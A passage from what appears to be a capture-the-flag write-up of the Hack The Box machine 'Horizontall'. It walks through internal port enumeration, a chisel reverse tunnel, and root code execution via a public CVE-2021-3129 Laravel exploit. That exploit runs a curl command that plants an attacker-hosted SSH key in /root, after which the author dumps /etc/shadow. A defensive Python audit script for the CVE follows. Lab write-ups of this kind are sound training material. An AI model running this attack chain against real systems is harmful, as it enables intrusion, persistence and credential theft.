class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">And we’ve gained a shell. Though, the default </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/sh</code></span><span class="SemanticString"> shell isn’t the most interactive shell. 
We can upgrade it by simply running </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/bash</code></span><span class="SemanticString"> on the victim machine:</span></span></p></div><div id="https://www.notion.so/56c137e790744cea9f771eecbeda0d17" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ bash</code></span></span></p></div><div id="https://www.notion.so/b90b369672494ac8bcab7086ac0c10d1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looking at the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/home</code></span><span class="SemanticString"> directory, we spot a “developer” user. Let’s see if we can read their files:</span></span></p></div><div id="https://www.notion.so/edcb4299aef24527902f3f675343bb86" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ls -la /home/developer</code></span></span></p></div><pre id="https://www.notion.so/c0b75451216447539009d941e8a2ffdf" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>total 108
drwxr-xr-x 8 developer developer 4096 Aug 2 12:07 .
drwxr-xr-x 3 root root 4096 May 25 2021 ..
lrwxrwxrwx 1 root root 9 Aug 2 12:05 .bash_history -> /dev/null
-rw-r----- 1 developer developer 242 Jun 1 2021 .bash_logout
-rw-r----- 1 developer developer 3810 Jun 1 2021 .bashrc
drwx------ 3 developer developer 4096 May 26 2021 .cache
-rw-rw---- 1 developer developer 58460 May 26 2021 composer-setup.php
drwx------ 5 developer developer 4096 Jun 1 2021 .config
drwx------ 3 developer developer 4096 May 25 2021 .gnupg
drwxrwx--- 3 developer developer 4096 May 25 2021 .local
drwx------ 12 developer developer 4096 May 26 2021 myproject
-rw-r----- 1 developer developer 807 Apr 4 2018 .profile
drwxrwx--- 2 developer developer 4096 Jun 4 2021 .ssh
-r--r--r-- 1 developer developer 33 Jan 15 08:37 user.txt
lrwxrwxrwx 1 root root 9 Aug 2 12:07 .viminfo -> /dev/null</span></span></span></code></pre><div id="https://www.notion.so/264b8753830846698f9ebb0b4c17f629" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can read the user flag!</span></span></p></div><div id="https://www.notion.so/f63decb9840d4edd8c9601d7ab48b582" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /home/developer/user.txt</code></span></span></p></div><h2 id="https://www.notion.so/4c04d1076ac24864b5ddea598c05ec72" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/4c04d1076ac24864b5ddea598c05ec72"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><div id="https://www.notion.so/98af7ff15e024c99a8a741d2c0ee6f4d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Enumerating for other services</strong></span></span></p></div><div id="https://www.notion.so/bda3500ba37f4b4987045296030e8458" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">While 
enumerating for common info on the machine, I found a few more services running that are only accessible from the internal network:</span></span></p></div><div id="https://www.notion.so/a3cd94d95d5d4e13af0acd1860d2063c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ netstat -tulnp</code></span></span></p></div><pre id="https://www.notion.so/211e728fa4ab4ff2bd101c4bffc3bb15" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 1614/node /usr/bin/
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -</span></span></span></code></pre><div id="https://www.notion.so/4fa5a739eae145bc99edfc54c0096ff3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We have already discovered ports 22 (SSH) and 80 (HTTP) in our external scan. If we make a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">curl</code></span><span class="SemanticString"> connection to port 1337 with something like:</span></span></p></div><div id="https://www.notion.so/c17a785a8e6d4ca5b28361054f1da22e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ curl 127.0.0.1:1337</code></span></span></p></div><div id="https://www.notion.so/e2d3347de18e44ed9dcfbf989ec9339f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We see that it is running the Strapi CMS that we just exploited. So, this leaves only ports 3306 and 8000. We know that port 3306 is usually reserved for MySQL databases, so let’s check out port 8000 first, as it could suggest another web application running on the machine.</span></span></p></div><div id="https://www.notion.so/00b4e208020846598d16c37fcc789e1e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Connecting to port 8000 with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">curl</code></span><span class="SemanticString"> again, there seems to be a web server running Laravel. 
We can use </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">chisel</code></span><span class="SemanticString">, a fast </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/jpillora/chisel">TCP/UDP tunnel over HTTP</a></span><span class="SemanticString">, to forward port 8000 on the victim’s machine to our local attacker machine through a reverse tunnel and investigate it further. First, let’s set up a server listening (on a port other than 8000) for the victim’s reverse connection:</span></span></p></div><div id="https://www.notion.so/4d1cd1bb66934cfd913a69b0e76a6bf7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./chisel server -p 9001 --reverse</code></span></span></p></div><div id="https://www.notion.so/7706994ce0e74799bd46e6f05d5990cb" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, on the victim’s machine, we upload the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">chisel</code></span><span class="SemanticString"> binary using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">scp</code></span><span class="SemanticString"> as we already have SSH access:</span></span></p></div><div id="https://www.notion.so/be79f19461c44e92afcd302672348cb2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ scp ./chisel strapi@horizontall.htb:/dev/shm</code></span></span></p></div><div 
id="https://www.notion.so/3eafed3021884148bae6402729f78d1e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Finally, on the victim machine, we run </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">chisel</code></span><span class="SemanticString"> in client mode to connect back to our server and forward the port to us:</span></span></p></div><div id="https://www.notion.so/b7f3bd81148d418c89af9753aaa2e1f0" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./chisel client 10.10.14.45:9001 R:8000:127.0.0.1:8000</code></span></span></p></div><div id="https://www.notion.so/9ab35a41c93347cd9f93802eb50cc5d6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Note that the forwarded port is the same one our local HTTP server is listening on (8000), so we will need to shut down the HTTP server first.</span></span></p></div><div id="https://www.notion.so/7f7affeae14647828396b53fa18563d5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can then check out the site by visiting </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">127.0.0.1:8000</code></span><span class="SemanticString"> in our browser:</span></span></p></div><div id="https://www.notion.so/12b2dcfdd8fc4dac936f9c299bbc544e" class="Image Image--Normal"><figure><a href="https://i.imgur.com/IcKsm10.png?width=1008"><img src="https://i.imgur.com/IcKsm10.png?width=1008" style="width:1008px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/c51efdb9279e4ed6b2207f1b32a4a4b4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Exploiting Laravel with CVE-2021-3129</strong></span></span></p></div><div id="https://www.notion.so/9e471d64b62343feb1cc5dbcb8f8c2f8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">It seems like the site is running an outdated version of Laravel, and may be vulnerable to RCE if debug mode is enabled (</span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3129">CVE-2021-3129</a></span><span class="SemanticString">). One way of verifying this is to see whether an exception causes a suggested “solution” to be generated, which can look something like this:</span></span></p></div><div id="https://www.notion.so/9bae7a158db8446cab80fbe5455a78ff" class="Image Image--Normal"><figure><a href="https://i.imgur.com/pU9iYEY.png?width=1008"><img src="https://i.imgur.com/pU9iYEY.png?width=1008" style="width:1008px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div><div id="https://www.notion.so/bee9e3457f834de3b534c5a2659aa169" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">This vulnerability is well documented and mainly stems from the insecure use of </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">file_get_contents()</code></span><span class="SemanticString"> and </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">file_put_contents()</code></span><span class="SemanticString"> calls in the Ignition error page module, particularly in its “Solutions” feature that suggests fixes to errors. We can use this </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/nth347/CVE-2021-3129_exploit">exploit written by nth347</a></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/c092969dd6ae48c383f648b7acc76ef6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./exploit.py http://127.0.0.1:8000 Monolog/RCE1 "whoami && id"</code></span></span></p></div><pre id="https://www.notion.so/aa9b62eefad84eafa0e69e3e12650b43" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[i] Trying to clear logs
[+] Logs cleared
[+] PHPGGC found. Generating payload and deploy it to the target
[+] Successfully converted logs to PHAR
[+] PHAR deserialized. Exploited
root
uid=0(root) gid=0(root) groups=0(root)
[i] Trying to clear logs
[+] Logs cleared</span></span></span></code></pre><div id="https://www.notion.so/b04bde88345e4429a81cd4b1dbe51287" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looks like this application is running on the machine as root! Let’s gain access by once again copying our SSH public key to the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">~/.ssh/authorized_keys</code></span><span class="SemanticString"> file. We begin by starting up our HTTP server, this time on a different port since 8000 is already taken:</span></span></p></div><div id="https://www.notion.so/1f06220465b24161985d066a8cb63603" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cd ./www && python -m http.server 7000</code></span></span></p></div><div id="https://www.notion.so/a2065929834c439384b62239797a7225" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Now, using the same exploit:</span></span></p></div><div id="https://www.notion.so/a0033d8ffb704bdb804213454f8d6efa" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ./exploit.py http://127.0.0.1:8000 Monolog/RCE1 "curl --create-dirs -o /root/.ssh/authorized_keys http://10.10.14.45:7000/authorized_keys"</code></span></span></p></div><div id="https://www.notion.so/dc14d57d3ad24a2dadd9fae5f2a1bde9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can then simply SSH into the machine as 
root:</span></span></p></div><div id="https://www.notion.so/e754984338d345cabf2e49052d2a0a5c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ssh root@horizontall.htb</code></span></span></p></div><div id="https://www.notion.so/8c0aef223d26410da1bdaa5649cf9198" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Let’s get the root flag!</span></span></p></div><div id="https://www.notion.so/180cbd62258348589c073e53db5967ba" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat root.txt</code></span></span></p></div><h2 id="https://www.notion.so/2d7161329dc347788603ac5c7945ed51" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/2d7161329dc347788603ac5c7945ed51"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><div id="https://www.notion.so/00c7cf35360740579021655bb7f89429" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can get the root user's password hash from </span><span class="SemanticString"><code 
class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/shadow</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/1632c9ac87e049898bb5056691b2e423" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /etc/shadow</code></span></span></p></div><pre id="https://www.notion.so/497d9b1607634aa0b741120d5e82322d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>root:$6$rGxQBZV9$SbzCXDzp1MEx7xxXYuV5voXCy4k9OdyCDbyJcWuETBujfMrpfVtTXjbx82bTNlPK6Ayg8SqKMYgVlYukVOKJz1:18836:0:99999:7:::</span></span></span></code></pre><div id="https://www.notion.so/474223ec7a0344edb97e1130f1809c38" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Let’s clean up after ourselves and delete any residual files:</span></span></p></div><div id="https://www.notion.so/aac6676e038e4cfca920b0dc3282ada7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ rm /dev/shm/chisel</code></span></span></p></div><h2 id="https://www.notion.so/5b49741e4f754515bcdf6af871639abc" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/5b49741e4f754515bcdf6af871639abc"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 
13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/41ea446da6c5497ebaf51ac1e96fb699" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString">Gobuster usage tutorial - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://erev0s.com/blog/gobuster-directory-dns-and-virtual-hosts-bruteforcing/">https://erev0s.com/blog/gobuster-directory-dns-and-virtual-hosts-bruteforcing/</a></span></span><div id="https://www.notion.so/07412859b7bd4cac81dabbcf426834b3" class="Bookmark"><a href="https://erev0s.com/blog/gobuster-directory-dns-and-virtual-hosts-bruteforcing/"><h5 class="Bookmark__Title">Gobuster for directory, DNS and virtual hosts bruteforcing</h5><p class="Bookmark__Desc">Tue 17 Mar 2020 In this article we are going to explore a "busting" tool called Gobuster. 
It is a really active project with many followers, which means that we get to see improvements and fixes for bugs often and of course new features are being added as time passes by.</p><p class="Bookmark__Link">https://erev0s.com/blog/gobuster-directory-dns-and-virtual-hosts-bruteforcing/</p></a></div></li><li id="https://www.notion.so/c91a665736994857952dee774f029530" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString">Technical analysis of CVE-2019-19609 - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://bittherapy.net/post/strapi-framework-remote-code-execution/">https://bittherapy.net/post/strapi-framework-remote-code-execution/</a></span></span><div id="https://www.notion.so/18c592563433489e9495271e84abd235" class="Bookmark"><a href="https://bittherapy.net/post/strapi-framework-remote-code-execution/"><h5 class="Bookmark__Title">Strapi Framework Vulnerable to Remote Code Execution (CVE-2019-19609)</h5><p class="Bookmark__Desc">CVE: CVE-2019-19609 Vendor: Strapi (https://strapi.io) Product: Strapi Framework Version Affected: strapi-3.0.0-beta.17.7 and earlier Fix PR: https://github.com/strapi/strapi/pull/4636 NPM Advisory: https://www.npmjs.com/advisories/1424 Description: &ldquo;Manage your content. Distribute it anywhere. 
The open source Headless CMS Front-End Developers love.&rdquo; Recently I came across a cool &ldquo;headless&rdquo; CMS called Strapi which makes creating dynamic sites painless.</p><p class="Bookmark__Link">https://bittherapy.net/post/strapi-framework-remote-code-execution/</p></a></div></li><li id="https://www.notion.so/3fab57849b6548ceb5491bcf27340644" class="NumberedList" value="3"><span class="SemanticStringArray"><span class="SemanticString">Tunneling with Chisel - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html">https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html</a></span></span><div id="https://www.notion.so/277ed79fd362470f95cb433688d4a98f" class="Bookmark"><a href="https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html"><h5 class="Bookmark__Title">Tunneling with Chisel and SSF</h5><p class="Bookmark__Desc">Update 2020-08-10] Chisel now has a built in SOCKS proxy! I also added a cheat sheet since I reference this post too often. 
[Original] Having just written up HTB Reddish, pivoting without SSH was at the top of my mind, and I've since learned of two programs that enable pivots, Chisel and Secure Socket Funneling (SSF).</p><p class="Bookmark__Link">https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html</p></a></div></li><li id="https://www.notion.so/15b4a1fa00564ae8be823a58591202c1" class="NumberedList" value="4"><span class="SemanticStringArray"><span class="SemanticString">Laravel debug mode RCE (CVE-2021-3129) - </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://www.ambionics.io/blog/laravel-debug-rce">https://www.ambionics.io/blog/laravel-debug-rce</a></span></span><div id="https://www.notion.so/0e9d2501283d4e79b5cc34211433d7c1" class="Bookmark"><a href="https://www.ambionics.io/blog/laravel-debug-rce"><h5 class="Bookmark__Title">Laravel <= v8.4.2 debug mode: Remote code execution</h5><p class="Bookmark__Desc">In late November of 2020, during a security audit for one of our clients, we came across a website based on Laravel. While the site's security state was pretty good, we remarked that it was running in debug mode, thus displaying verbose error messages including stack traces: Upon further inspection, we discovered that these stack traces were generated by Ignition, which was the default Laravel error page generator starting at version 6.</p><p class="Bookmark__Link">https://www.ambionics.io/blog/laravel-debug-rce</p></a></div></li></ol></article>
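The Laravel escalation above hinges on two conditions the writeup names: debug mode being on, and an Ignition release that still hands a request-supplied path to file_get_contents()/file_put_contents(). The following is an added, defender-side example that is not part of this writeup or of the nth347 exploit: a small Python audit that reads a Laravel .env and composer.lock offline and reports whether both conditions hold. The sample files, the 2.5.2 fixed-version cut-off (the version the CVE-2021-3129 advisory gives for the Ignition fix) and the accepted APP_DEBUG spellings are the example's own assumptions.

```python
"""Offline check for the two conditions that make CVE-2021-3129 reachable.

The Ignition "solutions" RCE needs both of these to hold:
  1. the app runs with APP_DEBUG=true, which enables Ignition's error page
     and its runnable-solution endpoint, and
  2. the installed facade/ignition package is older than 2.5.2, the release
     that added path validation around the file_get_contents() /
     file_put_contents() calls in the solution code (version per advisory).
Turning either one off closes the hole, so both are worth auditing.
"""
import json
import re

IGNITION_PACKAGE = "facade/ignition"
IGNITION_FIXED = (2, 5, 2)  # first release with the fix (assumption: per CVE text)


def parse_env(text):
    """Minimal .env parser: KEY=value lines, '#' comments, optional quotes."""
    values = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        values[key.strip()] = value.strip().strip('"').strip("'")
    return values


def debug_enabled(env):
    """Laravel casts APP_DEBUG to a boolean; these spellings all enable it."""
    return env.get("APP_DEBUG", "false").lower() in ("true", "1", "on", "yes")


def parse_version(ver):
    """Turn 'v2.3.6' or '2.5.2' into a comparable tuple of ints."""
    nums = re.findall(r"\d+", ver)
    return tuple(int(n) for n in nums[:3]) or (0,)


def ignition_version(lock_text):
    """Installed facade/ignition version from composer.lock, or None."""
    lock = json.loads(lock_text)
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        if pkg.get("name") == IGNITION_PACKAGE:
            return pkg.get("version")
    return None


def assess(env_text, lock_text):
    """Report which exposure conditions hold for a .env / composer.lock pair."""
    env = parse_env(env_text)
    version = ignition_version(lock_text)
    old_ignition = version is not None and parse_version(version) < IGNITION_FIXED
    debug = debug_enabled(env)
    return {
        "app_env": env.get("APP_ENV"),
        "debug": debug,
        "ignition_version": version,
        "ignition_vulnerable": old_ignition,
        # Code execution through the solution endpoint needs both.
        "exposed": debug and old_ignition,
    }


# Constructed sample files (not taken from the box), modelled on a
# production deployment that was left in debug mode.
SAMPLE_ENV = """\
APP_NAME=Laravel
APP_ENV=production
APP_KEY=base64:PLACEHOLDER
APP_DEBUG=true
"""
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "laravel/framework", "version": "v8.4.2"},
        {"name": IGNITION_PACKAGE, "version": "2.3.6"},
    ],
    "packages-dev": [],
})
# The two remediations, each applied on its own.
DEBUG_OFF_ENV = SAMPLE_ENV.replace("APP_DEBUG=true", "APP_DEBUG=false")
PATCHED_LOCK = SAMPLE_LOCK.replace('"2.3.6"', '"2.5.2"')

if __name__ == "__main__":
    for label, env, lock in (("as deployed", SAMPLE_ENV, SAMPLE_LOCK),
                             ("debug off", DEBUG_OFF_ENV, SAMPLE_LOCK),
                             ("ignition patched", SAMPLE_ENV, PATCHED_LOCK)):
        print(f"{label:17s} {assess(env, lock)}")
```

Only the combination of debug mode and an old Ignition is reported as exposed; either remediation alone clears the flag, which is the check a deployment review would want to run before trusting a production .env.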
<footer class="Footer">
<div>samiko@127.0.0.1~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>